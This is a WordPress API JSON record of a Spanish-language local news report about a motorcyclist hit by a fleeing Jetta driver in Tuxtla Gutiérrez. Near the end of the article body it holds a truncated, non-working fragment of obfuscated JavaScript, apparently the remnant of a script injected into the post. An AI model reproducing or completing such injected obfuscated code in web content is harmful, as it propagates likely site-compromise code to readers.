{"id":18509,"date":"2024-10-23T03:58:16","date_gmt":"2024-10-23T03:58:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18509"},"modified":"2024-10-23T03:58:17","modified_gmt":"2024-10-23T03:58:17","slug":"atropellan-a-motociclista-en-la-calle-central","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18509","title":{"rendered":"Atropellan a motociclista en la Calle Central"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"18511\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655810456-576x1024.jpg\" alt=\"\" class=\"wp-image-18511\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655810456-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655810456-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655810456-768x1366.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655810456-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655810456.jpg 899w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"18510\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655813002-1024x576.jpg\" alt=\"\" class=\"wp-image-18510\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655813002-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655813002-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655813002-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655813002.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"18512\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655807741-576x1024.jpg\" alt=\"\" class=\"wp-image-18512\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655807741-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655807741-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655807741-768x1366.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655807741-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729655807741.jpg 899w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 22 de octubre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la tarde, un motociclista fue atropellado cuando circulaba sobre la Calle Central a la altura de la 22 Norte de la Colonia Albania Baja de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 el conductor de la moto corr\u00eda de Oriente a Poniente pero se paso la preferencia de la Calle Central y fue embestido.<\/p>\n\n\n\n<p>El conductor del Vw Jetta de color negro circulaba de Norte a Sur con preferencia.<\/p>\n\n\n\n<p>Por el golpe el motociclista sali\u00f3 volando y qued\u00f3 tendido sobre el pavimento y posteriormente fue auxiliado por param\u00e9dicos voluntarios y descartaron heridas graves.<\/p>\n\n\n\n<p>El conductor de Jetts escap\u00f3 con rumbo al Sur de la Ciudad, mientras que el motociclista se retir\u00f3 despu\u00e9s de las curaciones.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 22 de octubre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la tarde, un motociclista fue atropellado cuando circulaba sobre la Calle Central a la altura de la 22 Norte de la Colonia Albania Baja de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, este hecho ocurri\u00f3 el conductor de la moto &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18512,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-18509","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18509","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18509"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18509\/revisions"}],"predecessor-version":[{"id":18513,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18509\/revisions\/18513"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18512"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18509"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18509"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18509"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}